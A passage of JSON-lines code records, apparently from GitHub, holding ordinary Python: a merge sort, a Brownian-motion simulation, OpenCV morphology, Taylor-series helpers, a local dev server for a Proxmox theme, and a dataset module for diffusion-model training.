+{"seq_id":"24066709177","text":"def process(arr, left, right):\r\n \r\n if left == right:\r\n return\r\n \r\n mid = left + int((right-left)>>1)\r\n process(arr, left, mid)\r\n process(arr, mid + 1, right)\r\n merge(arr, left, mid, right)\r\n\r\n\r\n\r\ndef merge(arr, left, mid, right):\r\n \r\n help_list = [0] * (right-left+1)\r\n \r\n i = 0\r\n left_index = left\r\n right_index = mid + 1\r\n \r\n while left_index <= mid and right_index <= right:\r\n if arr[left_index] < arr[right_index]:\r\n help_list[i] = arr[left_index]\r\n left_index += 1\r\n else:\r\n help_list[i] = arr[right_index]\r\n right_index += 1\r\n i += 1\r\n while left_index <= mid:\r\n help_list[i] = arr[left_index]\r\n left_index += 1\r\n i += 1\r\n while right_index <= right:\r\n help_list[i] = arr[right_index]\r\n right_index += 1\r\n i += 1\r\n \r\n for i in range(right-left+1):\r\n arr[left+i] = help_list[i]\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n \r\n arr = list(range(20))\r\n\r\n import random\r\n random.shuffle(arr)\r\n print(arr)\r\n\r\n process(arr, 0, len(arr)-1)\r\n print(arr)\r\n\r\n# [4, 10, 8, 16, 17, 3, 13, 9, 15, 7, 14, 18, 11, 2, 5, 6, 1, 12, 19, 0]\r\n# [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19]\r\n","repo_name":"iubizi/014-merge-sort","sub_path":"merge sort.py","file_name":"merge sort.py","file_ext":"py","file_size_in_byte":1297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"71426528969","text":"import matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nimport numpy as np\n\n##### PARAMETERS #####\n\nTf = 100000 # Final time - seconds\nm = 1 # Particle mass\ngamma = 2 # Friction\nkb = 1 # Boltzmann cte = 1 for simplicity\nT = 300 # [k] - Temperature\n\n\n###### Discrete time\nt = np.linspace(0, 1000, num = Tf)\ndt = t[2]-t[1]\n\n###### Noise\naux = np.zeros(Tf) # auxiliar array of the right size\n\n# Function to create random numbers\nRandom = lambda n: np.random.normal(loc=0.0, scale=1.0) # Generate random number\nMapRandom = map(Random,aux)\n\n# Array of Noise\neta = np.sqrt(2*kb*T*gamma)*np.array(list(MapRandom)) # eta(t)\n\n###### Initial position and velocity\n\nx0 = 0 \nv0 = 0 \n\n###### Arrays of position and velocities\n\nx = np.zeros(1)\nx[0] = x0\nv = np.zeros(1)\nv[0] = v0\n\n###### Discrete Langevin Equation\n\ni = 1\nwhile i < Tf:\n v = np.append(v, ((dt/m)*eta[i]+v[i-1])/(1+(dt/m)*gamma))\n x = np.append(x, x[i-1] + v[i]*dt)\n i+=1\nfig, (left, right) = plt.subplots(1, 2, figsize=(15,5))\n\nright.plot(t, x)\nleft.plot(t, v)\n\nfig.suptitle('1-D Броуновское движение', fontsize=20)\nright.set(xlabel = \"Время, с\", ylabel = \"x(t)\")\nleft.set(xlabel = \"Время, с\", ylabel = \"v(t)\")\n\nright.set_xlim([0, 1000]);\nleft.set_xlim([0, 1000]);\nplt.show()\n\n\n","repo_name":"chu412/Physical-modelling","sub_path":"Тема_Статистическая физика/brownian_motion_2.py","file_name":"brownian_motion_2.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"36577291335","text":"import cv2\nfrom matplotlib import pyplot as plt\nimport numpy as np\n\ndef main():\n img = cv2.imread('2.jpg', 0)\n _, thresh = cv2.threshold(img, 127, 255, cv2.THRESH_BINARY)\n # erosion\n kernel = np.ones((11, 11), np.uint8)\n erosion = cv2.erode(thresh, kernel, iterations=1)\n # dilation\n dilation = cv2.dilate(thresh, kernel, iterations=1)\n # Opening\n opening = cv2.morphologyEx(thresh, cv2.MORPH_OPEN, kernel)\n # Closing\n closing = cv2.morphologyEx(thresh, cv2.MORPH_CLOSE, kernel)\n # Display Images\n plt.subplot(321), plt.imshow(img, cmap = 'gray'), plt.axis('off')\n plt.title('Original Image'), plt.xticks([]), plt.yticks([])\n plt.subplot(322),plt.imshow(thresh, cmap = 'gray')\n plt.title('Binary Image'), plt.xticks([]), plt.yticks([])\n plt.subplot(323),plt.imshow(erosion, cmap = 'gray')\n plt.title('Eroded Image'), plt.xticks([]), plt.yticks([])\n plt.subplot(324),plt.imshow(dilation, cmap = 'gray')\n plt.title('Dilated Image'), plt.xticks([]), plt.yticks([])\n plt.subplot(325),plt.imshow(opening, cmap = 'gray')\n plt.title('Opening Image'), plt.xticks([]), plt.yticks([])\n plt.subplot(326),plt.imshow(closing, cmap = 'gray')\n plt.title('Closing Image'), plt.xticks([]), plt.yticks([])\n plt.show()\n\nif __name__ == '__main__':\n main()","repo_name":"himanshuMaheshwari2311/Image-Processing-Lab","sub_path":"image-morphology/morphological_operation.py","file_name":"morphological_operation.py","file_ext":"py","file_size_in_byte":1313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"8937971730","text":"def factorial(n):\n if n == 0:\n return 1.0\n else:\n return n * factorial(n-1)\n\n\ndef taylor_exp(n):\n return [1.0/factorial(i) for i in range(n)]\n\n\ndef taylor_sin(n):\n res = []\n for i in range(n):\n if i % 2 == 1:\n res.append((-1)**((i-1)/2)/float(factorial(i)))\n else:\n res.append(0.0)\n return res\n\n\ndef benchmark():\n taylor_exp(500)\n taylor_sin(500)\n\n\nif __name__ == '__main__':\n benchmark()\n #python -m cProfile -o prof.out taylor.py\n #pyprof2calltree -i prof.out -o prof.calltree\n #kcachegrind prof.calltree # or qcachegrind prof.calltree\n #you can use instructions at https://github.com/rkern/line_profiler. kernprof.py -l -v simul.py","repo_name":"andrey-ladygin-loudclear/deep-learning","sub_path":"helper/factorial/taylor.py","file_name":"taylor.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"1387060843","text":"# Script to assist with PVEDiscordDark development\r\n#\r\n# By default serves HTTP on port 3000, any *.js request gets the JS script, any *.css request gets the CSS file and any image request gets corresponding image\r\n# Meant to be used with the \"Requestly\" browser extension to redirect PVEDD requests from PVE server to localhost:3000\r\n#\r\n\r\nfrom http.server import HTTPServer, BaseHTTPRequestHandler\r\nimport json\r\nimport os\r\n\r\nPORT = 3000\r\nDIR_SASS = os.path.join(os.path.dirname(__file__), \"sass\")\r\nDIR_IMAGES = os.path.join(os.path.dirname(__file__), \"images\")\r\nDIR_JS = os.path.join(os.path.dirname(__file__), \"js\")\r\n\r\n\r\nclass Server(BaseHTTPRequestHandler):\r\n def log_message(self, format, *args):\r\n return\r\n\r\n def _set_headers(self, status, type):\r\n self.send_response(status)\r\n self.send_header(\"Content-type\", type)\r\n self.end_headers()\r\n\r\n def do_GET(self):\r\n status = 200\r\n type = \"application/json\"\r\n data = None\r\n\r\n file = self.path.rpartition(\"/\")[2]\r\n ext = file.rpartition(\".\")[2]\r\n\r\n if ext == \"css\":\r\n data = open(os.path.join(DIR_SASS, \"PVEDiscordDark.css\"), \"rb\").read()\r\n type = \"text/css\"\r\n elif ext == \"js\":\r\n data = open(os.path.join(DIR_JS, \"PVEDiscordDark.js\"), \"rb\").read()\r\n type = \"application/javascript\"\r\n elif ext == \"png\" or ext == \"jpg\" or ext == \"jpeg\":\r\n try:\r\n data = open(os.path.join(DIR_IMAGES, file), \"rb\").read()\r\n type = f\"image/{ext}\"\r\n except FileNotFoundError:\r\n status = 404\r\n elif ext == \"svg\":\r\n try:\r\n data = open(os.path.join(DIR_IMAGES, file), \"rb\").read()\r\n type = f\"image/svg+xml\"\r\n except FileNotFoundError:\r\n status = 404\r\n else:\r\n status = 400\r\n self._set_headers(status, type)\r\n if status == 200:\r\n self.wfile.write(data)\r\n else:\r\n self.wfile.write(json.dumps({\"error\": status}).encode())\r\n\r\n\r\nif __name__ == \"__main__\":\r\n print(f\"Serving on localhost:{PORT}\")\r\n server = HTTPServer(server_address=(\"\", PORT), RequestHandlerClass=Server)\r\n try:\r\n server.serve_forever()\r\n except KeyboardInterrupt:\r\n quit()\r\n","repo_name":"Weilbyte/PVEDiscordDark","sub_path":"PVEDiscordDark/serve.py","file_name":"serve.py","file_ext":"py","file_size_in_byte":2328,"program_lang":"python","lang":"en","doc_type":"code","stars":2505,"dataset":"github-code","pt":"16"}
+{"seq_id":"74164189127","text":"from torch.utils.data import Dataset\nfrom torchvision import datasets\nimport torchvision.transforms as transforms\nimport numpy as np\nimport torch\nimport math\nimport random\nfrom PIL import Image\nimport os\nimport glob\nimport einops\nimport torchvision.transforms.functional as F\n\n\nclass UnlabeledDataset(Dataset):\n def __init__(self, dataset):\n self.dataset = dataset\n\n def __len__(self):\n return len(self.dataset)\n\n def __getitem__(self, item):\n data = tuple(self.dataset[item][:-1]) # remove label\n if len(data) == 1:\n data = data[0]\n return data\n\n\nclass LabeledDataset(Dataset):\n def __init__(self, dataset, labels):\n self.dataset = dataset\n self.labels = labels\n\n def __len__(self):\n return len(self.dataset)\n\n def __getitem__(self, item):\n return self.dataset[item], self.labels[item]\n\n\nclass CFGDataset(Dataset): # for classifier free guidance\n def __init__(self, dataset, p_uncond, empty_token):\n self.dataset = dataset\n self.p_uncond = p_uncond\n self.empty_token = empty_token\n\n def __len__(self):\n return len(self.dataset)\n\n def __getitem__(self, item):\n x, label = self.dataset[item]\n y = 0\n if type(label) == np.ndarray: # If need to keep the label\n if label[1] == 1: # if label[1] == 1, this is a true label or high confidence prediction, Keep labels\n y = label[0]\n elif label[1] != 0: # for exp6\n if random.random() < self.p_uncond * (1-label[1]):\n y = self.empty_token\n else:\n y = label[0]\n elif random.random() < self.p_uncond: # set label none with probability p_uncond\n y = self.empty_token\n else: # keep the label if not set to none\n y = label[0]\n\n else: # if label is not a numpy array, then we don't need to keep labels\n if random.random() < self.p_uncond:\n y = self.empty_token\n else:\n y = label\n\n return x, np.int64(y)\n\n\nclass DatasetFactory(object):\n\n def __init__(self):\n self.train = None\n self.test = None\n\n def get_split(self, split, labeled=False):\n if split == \"train\":\n dataset = self.train\n elif split == \"test\":\n dataset = self.test\n else:\n raise ValueError\n\n if self.has_label:\n return dataset if labeled else UnlabeledDataset(dataset)\n else:\n assert not labeled\n return dataset\n\n def unpreprocess(self, v): # to B C H W and [0, 1]\n v = 0.5 * (v + 1.)\n v.clamp_(0., 1.)\n return v\n\n @property\n def has_label(self):\n return True\n\n @property\n def data_shape(self):\n raise NotImplementedError\n\n @property\n def data_dim(self):\n return int(np.prod(self.data_shape))\n\n @property\n def fid_stat(self):\n return None\n\n def sample_label(self, n_samples, device):\n raise NotImplementedError\n\n def label_prob(self, k):\n raise NotImplementedError\n\n\n# CIFAR10\n\nclass CIFAR10(DatasetFactory):\n r\"\"\" CIFAR10 dataset\n\n Information of the raw dataset:\n train: 50,000\n test: 10,000\n shape: 3 * 32 * 32\n \"\"\"\n\n def __init__(self, path, random_flip=False, cfg=False, p_uncond=None, cluster_path=None):\n super().__init__()\n if cluster_path == '':\n cluster_path = None\n\n transform_train = [transforms.ToTensor(), transforms.Normalize(0.5, 0.5)]\n transform_test = [transforms.ToTensor(), transforms.Normalize(0.5, 0.5)]\n if random_flip: # only for train\n transform_train.append(transforms.RandomHorizontalFlip())\n transform_train = transforms.Compose(transform_train)\n transform_test = transforms.Compose(transform_test)\n self.train = datasets.CIFAR10(path, train=True, transform=transform_train, download=True)\n self.test = datasets.CIFAR10(path, train=False, 
transform=transform_test, download=True)\n\n if cluster_path is not None:\n print(f'renew targets from {cluster_path}')\n self.train.targets = np.load(cluster_path)\n assert len(self.train.targets) == 50000\n self.K = max(self.train.targets) + 1\n self.cnt = torch.tensor([len(np.where(np.array(self.train.targets) == k)[0]) for k in range(self.K)]).float()\n self.frac = [self.cnt[k] / 50000 for k in range(self.K)]\n print(f'{self.K} classes')\n print(f'cnt: {self.cnt}')\n print(f'frac: {self.frac}')\n\n if cfg: # classifier free guidance\n assert p_uncond is not None\n print(f'prepare the dataset for classifier free guidance with p_uncond={p_uncond}')\n self.train = CFGDataset(self.train, p_uncond, self.K)\n\n @property\n def data_shape(self):\n return 3, 32, 32\n\n @property\n def fid_stat(self):\n return 'assets/fid_stats/fid_stats_cifar10_train_pytorch.npz'\n\n def sample_label(self, n_samples, device):\n return torch.multinomial(self.cnt, n_samples, replacement=True).to(device)\n\n def label_prob(self, k):\n return self.frac[k]\n\n\n# ImageNet\n\n\nclass FeatureDataset(Dataset):\n def __init__(self, path):\n super().__init__()\n self.path = path\n # names = sorted(os.listdir(path))\n # self.files = [os.path.join(path, name) for name in names]\n\n def __len__(self):\n return 1_281_167 * 2 # consider the random flip\n\n def __getitem__(self, idx):\n path = os.path.join(self.path, f'{idx}.npy')\n z, label = np.load(path, allow_pickle=True)\n return z, label\n\n\nclass ImageNet256Features(DatasetFactory): # the moments calculated by Stable Diffusion image encoder\n def __init__(self, path, cfg=False, p_uncond=None):\n super().__init__()\n print('Prepare dataset...')\n self.train = FeatureDataset(path)\n print('Prepare dataset ok')\n self.K = 1000\n\n if cfg: # classifier free guidance\n assert p_uncond is not None\n print(f'prepare the dataset for classifier free guidance with p_uncond={p_uncond}')\n self.train = CFGDataset(self.train, p_uncond, self.K)\n\n @property\n def data_shape(self):\n return 4, 32, 32\n\n @property\n def fid_stat(self):\n return f'assets/fid_stats/fid_stats_imagenet256_guided_diffusion.npz'\n\n def sample_label(self, n_samples, device):\n return torch.randint(0, 1000, (n_samples,), device=device)\n\n\nclass ImageNet512Features(DatasetFactory): # the moments calculated by Stable Diffusion image encoder\n def __init__(self, path, cfg=False, p_uncond=None):\n super().__init__()\n print('Prepare dataset...')\n self.train = FeatureDataset(path)\n print('Prepare dataset ok')\n self.K = 1000\n\n if cfg: # classifier free guidance\n assert p_uncond is not None\n print(f'prepare the dataset for classifier free guidance with p_uncond={p_uncond}')\n self.train = CFGDataset(self.train, p_uncond, self.K)\n\n @property\n def data_shape(self):\n return 4, 64, 64\n\n @property\n def fid_stat(self):\n return f'assets/fid_stats/fid_stats_imagenet512_guided_diffusion.npz'\n\n def sample_label(self, n_samples, device):\n return torch.randint(0, 1000, (n_samples,), device=device)\n\n\nclass ImageNet(DatasetFactory):\n def __init__(self, path, resolution, random_crop=False, random_flip=True, cluster_path=None, fnames_path=None):\n super().__init__()\n if cluster_path == '':\n cluster_path = None\n if fnames_path == '':\n fnames_path = None\n\n print(f'Counting ImageNet files from {path}')\n train_files = _list_image_files_recursively(os.path.join(path, 'train'))\n class_names = [os.path.basename(path).split(\"_\")[0] for path in train_files]\n sorted_classes = {x: i for i, x in 
enumerate(sorted(set(class_names)))}\n train_labels = [sorted_classes[x] for x in class_names]\n print('Finish counting ImageNet files')\n\n self.train = ImageDataset(resolution, train_files, labels=train_labels, random_crop=random_crop, random_flip=random_flip)\n self.resolution = resolution\n if len(self.train) != 1_281_167:\n print(f'Missing train samples: {len(self.train)} < 1281167')\n\n if cluster_path is not None:\n print(f'renew targets from {cluster_path}')\n _cluster_labels = np.load(cluster_path)\n _fnames = torch.load(fnames_path)\n fnames_cluster_labels = dict(zip(_fnames, _cluster_labels))\n self.train.labels = [fnames_cluster_labels[os.path.split(fname)[-1]] for fname in self.train.image_paths]\n\n self.K = max(self.train.labels) + 1\n cnt = dict(zip(*np.unique(self.train.labels, return_counts=True)))\n self.cnt = torch.tensor([cnt[k] for k in range(self.K)]).float()\n self.frac = [self.cnt[k] / len(self.train.labels) for k in range(self.K)]\n print(f'{self.K} classes')\n print(f'cnt[:10]: {self.cnt[:10]}')\n print(f'frac[:10]: {self.frac[:10]}')\n\n @property\n def data_shape(self):\n return 3, self.resolution, self.resolution\n\n @property\n def fid_stat(self):\n return f'assets/fid_stats/fid_stats_imagenet{self.resolution}_guided_diffusion.npz'\n\n def sample_label(self, n_samples, device):\n return torch.multinomial(self.cnt, n_samples, replacement=True).to(device)\n\n def label_prob(self, k):\n return self.frac[k]\n\nclass ImageNet_semi(ImageNet):\n def __init__(self, path, resolution, random_crop=False, random_flip=True, cluster_path=None, fnames_path=None, is_true_labels_path=None):\n super().__init__(path, resolution, random_crop, random_flip, cluster_path, fnames_path)\n assert is_true_labels_path is not None\n print(f'concat label with is_true_label from {is_true_labels_path}')\n _fnames = torch.load(fnames_path)\n _is_true_labels = torch.load(is_true_labels_path)\n fnames_is_true_labels = dict(zip(_fnames, _is_true_labels))\n isTruelabels = [fnames_is_true_labels[os.path.split(fname)[-1]] for fname in self.train.image_paths]\n self.train.labels = [(label, isTruelabel) for label, isTruelabel in zip(self.train.labels, isTruelabels)]\n\n\ndef _list_image_files_recursively(data_dir):\n results = []\n for entry in sorted(os.listdir(data_dir)):\n full_path = os.path.join(data_dir, entry)\n ext = entry.split(\".\")[-1]\n if \".\" in entry and ext.lower() in [\"jpg\", \"jpeg\", \"png\", \"gif\"]:\n results.append(full_path)\n elif os.listdir(full_path):\n results.extend(_list_image_files_recursively(full_path))\n return results\n\n\nclass ImageDataset(Dataset):\n def __init__(\n self,\n resolution,\n image_paths,\n labels,\n random_crop=False,\n random_flip=True,\n ):\n super().__init__()\n self.resolution = resolution\n self.image_paths = image_paths\n self.labels = labels\n self.random_crop = random_crop\n self.random_flip = random_flip\n\n def __len__(self):\n return len(self.image_paths)\n\n def __getitem__(self, idx):\n path = self.image_paths[idx]\n pil_image = Image.open(path)\n pil_image.load()\n pil_image = pil_image.convert(\"RGB\")\n\n if self.random_crop:\n arr = random_crop_arr(pil_image, self.resolution)\n else:\n arr = center_crop_arr(pil_image, self.resolution)\n\n if self.random_flip and random.random() < 0.5:\n arr = arr[:, ::-1]\n\n arr = arr.astype(np.float32) / 127.5 - 1\n\n label = np.array(self.labels[idx], dtype=np.float64)\n return np.transpose(arr, [2, 0, 1]), label\n\n\ndef center_crop_arr(pil_image, image_size):\n # We are not on a new enough 
PIL to support the `reducing_gap`\n # argument, which uses BOX downsampling at powers of two first.\n # Thus, we do it by hand to improve downsample quality.\n while min(*pil_image.size) >= 2 * image_size:\n pil_image = pil_image.resize(\n tuple(x // 2 for x in pil_image.size), resample=Image.BOX\n )\n\n scale = image_size / min(*pil_image.size)\n pil_image = pil_image.resize(\n tuple(round(x * scale) for x in pil_image.size), resample=Image.BICUBIC\n )\n\n arr = np.array(pil_image)\n crop_y = (arr.shape[0] - image_size) // 2\n crop_x = (arr.shape[1] - image_size) // 2\n return arr[crop_y : crop_y + image_size, crop_x : crop_x + image_size]\n\n\ndef random_crop_arr(pil_image, image_size, min_crop_frac=0.8, max_crop_frac=1.0):\n min_smaller_dim_size = math.ceil(image_size / max_crop_frac)\n max_smaller_dim_size = math.ceil(image_size / min_crop_frac)\n smaller_dim_size = random.randrange(min_smaller_dim_size, max_smaller_dim_size + 1)\n\n # We are not on a new enough PIL to support the `reducing_gap`\n # argument, which uses BOX downsampling at powers of two first.\n # Thus, we do it by hand to improve downsample quality.\n while min(*pil_image.size) >= 2 * smaller_dim_size:\n pil_image = pil_image.resize(\n tuple(x // 2 for x in pil_image.size), resample=Image.BOX\n )\n\n scale = smaller_dim_size / min(*pil_image.size)\n pil_image = pil_image.resize(\n tuple(round(x * scale) for x in pil_image.size), resample=Image.BICUBIC\n )\n\n arr = np.array(pil_image)\n crop_y = random.randrange(arr.shape[0] - image_size + 1)\n crop_x = random.randrange(arr.shape[1] - image_size + 1)\n return arr[crop_y: crop_y + image_size, crop_x: crop_x + image_size]\n\n\n# CelebA\n\n\nclass Crop(object):\n def __init__(self, x1, x2, y1, y2):\n self.x1 = x1\n self.x2 = x2\n self.y1 = y1\n self.y2 = y2\n\n def __call__(self, img):\n return F.crop(img, self.x1, self.y1, self.x2 - self.x1, self.y2 - self.y1)\n\n def __repr__(self):\n return self.__class__.__name__ + \"(x1={}, x2={}, y1={}, y2={})\".format(\n self.x1, self.x2, self.y1, self.y2\n )\n\n\nclass CelebA(DatasetFactory):\n r\"\"\" train: 162,770\n val: 19,867\n test: 19,962\n shape: 3 * width * width\n \"\"\"\n\n def __init__(self, path, resolution=64, cluster_path=None):\n super().__init__()\n if cluster_path == '':\n cluster_path = None\n self.resolution = resolution\n\n cx = 89\n cy = 121\n x1 = cy - 64\n x2 = cy + 64\n y1 = cx - 64\n y2 = cx + 64\n\n transform = transforms.Compose([Crop(x1, x2, y1, y2), transforms.Resize(self.resolution),\n transforms.RandomHorizontalFlip(), transforms.ToTensor(),\n transforms.Normalize(0.5, 0.5)])\n self.train = datasets.CelebA(root=path, split=\"train\", target_type=[], transform=transform, download=True)\n self.train = UnlabeledDataset(self.train)\n\n if cluster_path is not None:\n print(f'get targets from {cluster_path}')\n self.labels = np.load(cluster_path)\n self.train = LabeledDataset(self.train, self.labels)\n self.K = max(self.labels) + 1\n self.cnt = torch.tensor([len(np.where(np.array(self.labels) == k)[0]) for k in range(self.K)]).float()\n self.frac = [self.cnt[k] / 50000 for k in range(self.K)]\n print(f'{self.K} classes')\n print(f'cnt: {self.cnt}')\n print(f'frac: {self.frac}')\n else:\n self.labels = None\n\n @property\n def data_shape(self):\n return 3, self.resolution, self.resolution\n\n @property\n def fid_stat(self):\n return 'assets/fid_stats/fid_stats_celeba64_train_50000_ddim.npz'\n\n @property\n def has_label(self):\n return self.labels is not None\n\n def sample_label(self, n_samples, 
device):\n return torch.multinomial(self.cnt, n_samples, replacement=True).to(device)\n\n def label_prob(self, k):\n return self.frac[k]\n\n\n# LSUN Bedroom\n\n\nclass LSUNBedroom(DatasetFactory):\n def __init__(self, path, resolution=64):\n super().__init__()\n self.resolution = resolution\n transform = transforms.Compose([transforms.Resize(resolution), transforms.CenterCrop(resolution),\n transforms.ToTensor(), transforms.Normalize(0.5, 0.5)])\n self.train = UnlabeledDataset(datasets.LSUN(root=path, classes=[\"bedroom_train\"], transform=transform)) \\\n if os.path.exists(os.path.join(path, 'bedroom_train_lmdb')) else None\n\n @property\n def data_shape(self):\n return 3, self.resolution, self.resolution\n\n @property\n def fid_stat(self):\n return f'assets/fid_stats/fid_stats_lsun_bedroom{self.resolution}_train_50000.npz'\n\n @property\n def has_label(self):\n return False\n\n\nclass ImageDataset2(Dataset):\n def __init__(self, path, transform=None):\n super().__init__()\n names = sorted(os.listdir(path))\n self.local_images = [os.path.join(path, name) for name in names]\n self.transform = transform\n\n def __len__(self):\n return len(self.local_images)\n\n def __getitem__(self, idx):\n X = Image.open(self.local_images[idx])\n if self.transform is not None:\n X = self.transform(X)\n return X\n\n\nclass LSUNBedroom64(DatasetFactory):\n def __init__(self, path, cluster_path=None):\n super().__init__()\n if cluster_path == '':\n cluster_path = None\n\n train_path = os.path.join(path, 'lsun_bedroom64_train')\n transform = transforms.Compose([transforms.ToTensor(), transforms.Normalize(0.5, 0.5)])\n self.train = ImageDataset2(path=train_path, transform=transform) if os.path.exists(train_path) else None\n\n if cluster_path is not None:\n print(f'get targets from {cluster_path}')\n self.labels = np.load(cluster_path)\n self.train = LabeledDataset(self.train, self.labels)\n self.K = max(self.labels) + 1\n self.cnt = torch.tensor([len(np.where(np.array(self.labels) == k)[0]) for k in range(self.K)]).float()\n self.frac = [self.cnt[k] / 50000 for k in range(self.K)]\n print(f'{self.K} classes')\n print(f'cnt: {self.cnt}')\n print(f'frac: {self.frac}')\n else:\n self.labels = None\n\n @property\n def data_shape(self):\n return 3, 64, 64\n\n @property\n def fid_stat(self):\n return f'assets/fid_stats/fid_stats_lsun_bedroom64_train_50000.npz'\n\n @property\n def has_label(self):\n return self.labels is not None\n\n def sample_label(self, n_samples, device):\n return torch.multinomial(self.cnt, n_samples, replacement=True).to(device)\n\n def label_prob(self, k):\n return self.frac[k]\n\n\n# MS COCO\n\n\ndef center_crop(width, height, img):\n resample = {'box': Image.BOX, 'lanczos': Image.LANCZOS}['lanczos']\n crop = np.min(img.shape[:2])\n img = img[(img.shape[0] - crop) // 2: (img.shape[0] + crop) // 2,\n (img.shape[1] - crop) // 2: (img.shape[1] + crop) // 2]\n try:\n img = Image.fromarray(img, 'RGB')\n except:\n img = Image.fromarray(img)\n img = img.resize((width, height), resample)\n\n return np.array(img).astype(np.uint8)\n\n\nclass MSCOCODatabase(Dataset):\n def __init__(self, root, annFile, size=None):\n from pycocotools.coco import COCO\n self.root = root\n self.height = self.width = size\n\n self.coco = COCO(annFile)\n self.keys = list(sorted(self.coco.imgs.keys()))\n\n def _load_image(self, key: int):\n path = self.coco.loadImgs(key)[0][\"file_name\"]\n return Image.open(os.path.join(self.root, path)).convert(\"RGB\")\n\n def _load_target(self, key: int):\n return 
self.coco.loadAnns(self.coco.getAnnIds(key))\n\n def __len__(self):\n return len(self.keys)\n\n def __getitem__(self, index):\n key = self.keys[index]\n image = self._load_image(key)\n image = np.array(image).astype(np.uint8)\n image = center_crop(self.width, self.height, image).astype(np.float32)\n image = (image / 127.5 - 1.0).astype(np.float32)\n image = einops.rearrange(image, 'h w c -> c h w')\n\n anns = self._load_target(key)\n target = []\n for ann in anns:\n target.append(ann['caption'])\n\n return image, target\n\n\ndef int2bit(x, n=8):\n x = einops.rearrange(x, '... -> ... ()')\n x = np.right_shift(x, np.arange(n))\n x = x % 2\n return x\n\n\ndef bit2int(x):\n n = x.shape[-1]\n if isinstance(x, np.ndarray):\n return (x * (2 ** np.arange(n))).sum(axis=-1)\n elif isinstance(x, torch.Tensor):\n return (x * (2 ** torch.arange(n, device=x.device))).sum(dim=-1)\n else:\n raise NotImplementedError\n\n\nclass _BitMSCOCOText(Dataset):\n def __init__(self, annFile):\n from pycocotools.coco import COCO\n self.coco = COCO(annFile)\n self.keys = list(sorted(self.coco.imgs.keys()))\n\n from transformers import CLIPTokenizer\n self.tokenizer = CLIPTokenizer.from_pretrained(\"openai/clip-vit-large-patch14\")\n self.n_bits = self.tokenizer.vocab_size.bit_length()\n\n def _load_target(self, key: int):\n return self.coco.loadAnns(self.coco.getAnnIds(key))\n\n def __len__(self):\n return len(self.keys)\n\n def __getitem__(self, index):\n key = self.keys[index]\n anns = self._load_target(key)\n ann = random.choice(anns)['caption'] # string\n\n x = self.tokenizer(ann, truncation=True, max_length=77, return_length=True,\n return_overflowing_tokens=False, padding=\"max_length\", return_tensors=\"pt\")[\"input_ids\"]\n x = x.squeeze(dim=0) # tokens\n x = x.numpy()\n x = int2bit(x, self.n_bits) # {0, 1}\n x = 2 * torch.tensor(x, dtype=torch.float32) - 1 # {-1., 1.}\n return x\n\n\nclass BitMSCOCOText(DatasetFactory):\n def __init__(self, path):\n super().__init__()\n self.train = _BitMSCOCOText(os.path.join(path, 'annotations', 'captions_train2014.json'))\n\n def unpreprocess(self, v): # to str\n # v: {-1., 1.}\n v = v > 0 # B L N\n v = bit2int(v).cpu().detach() # B L\n ss = []\n for _v in v:\n _v = list(filter(lambda x: 0 <= x <= self.train.tokenizer.vocab_size - 1, _v))\n s = self.train.tokenizer.decode(_v, skip_special_tokens=True)\n ss.append(s)\n return ss\n\n @property\n def data_shape(self):\n return 77, 16\n\n @property\n def has_label(self):\n return False\n\n\ndef get_feature_dir_info(root):\n files = glob.glob(os.path.join(root, '*.npy'))\n files_caption = glob.glob(os.path.join(root, '*_*.npy'))\n num_data = len(files) - len(files_caption)\n n_captions = {k: 0 for k in range(num_data)}\n for f in files_caption:\n name = os.path.split(f)[-1]\n k1, k2 = os.path.splitext(name)[0].split('_')\n n_captions[int(k1)] += 1\n return num_data, n_captions\n\n\nclass MSCOCOFeatureDataset(Dataset):\n # the image features are got through sample\n def __init__(self, root):\n self.root = root\n self.num_data, self.n_captions = get_feature_dir_info(root)\n\n def __len__(self):\n return self.num_data\n\n def __getitem__(self, index):\n z = np.load(os.path.join(self.root, f'{index}.npy'))\n k = random.randint(0, self.n_captions[index] - 1)\n c = np.load(os.path.join(self.root, f'{index}_{k}.npy'))\n return z, c\n\n\ndef get_karpathy_val_split_gts(path): # the ground truth for calculating captioning metrics, e.g., BLEU\n split_file = os.path.join(path, f'val_ids.npy')\n split_info = np.load(split_file)\n from 
pycocotools.coco import COCO\n coco_train2014 = COCO(os.path.join(path, 'captions_train2014.json'))\n coco_val2014 = COCO(os.path.join(path, 'captions_val2014.json'))\n gts = {}\n for fname, key in split_info:\n key = int(key)\n if 'train' in fname:\n gts[key] = coco_train2014.loadAnns(coco_train2014.getAnnIds(key))\n else:\n gts[key] = coco_val2014.loadAnns(coco_val2014.getAnnIds(key))\n return gts\n\n\nclass MSCOCOFeatureDatasetKarpathySplit(Dataset):\n def __init__(self, path, split, ret_key=False):\n self.path = path\n self.ret_key =ret_key\n split_file = os.path.join(path, f'{split}_ids.npy')\n self.split_info = np.load(split_file)\n\n from pycocotools.coco import COCO\n self.coco_train2014 = COCO(os.path.join(path, 'captions_train2014.json'))\n self.coco_val2014 = COCO(os.path.join(path, 'captions_val2014.json'))\n self.coco_train2014_keys = list(sorted(self.coco_train2014.imgs.keys()))\n self.coco_val2014_keys = list(sorted(self.coco_val2014.imgs.keys()))\n self.coco_train2014_keys_indexes = {key: index for index, key in enumerate(self.coco_train2014_keys)}\n self.coco_val2014_keys_indexes = {key: index for index, key in enumerate(self.coco_val2014_keys)}\n\n self.coco_train2014_num_data, self.coco_train2014_n_captions = get_feature_dir_info(os.path.join(path, 'train'))\n self.coco_val2014_num_data, self.coco_val2014_n_captions = get_feature_dir_info(os.path.join(path, 'val'))\n\n\n def __len__(self):\n return len(self.split_info)\n\n def __getitem__(self, index):\n fname, key = self.split_info[index]\n key = int(key)\n if key in self.coco_train2014_keys_indexes:\n assert key not in self.coco_val2014_keys_indexes\n assert 'train' in fname\n index = self.coco_train2014_keys_indexes[key]\n z = np.load(os.path.join(self.path, 'train', f'{index}.npy'))\n k = random.randint(0, 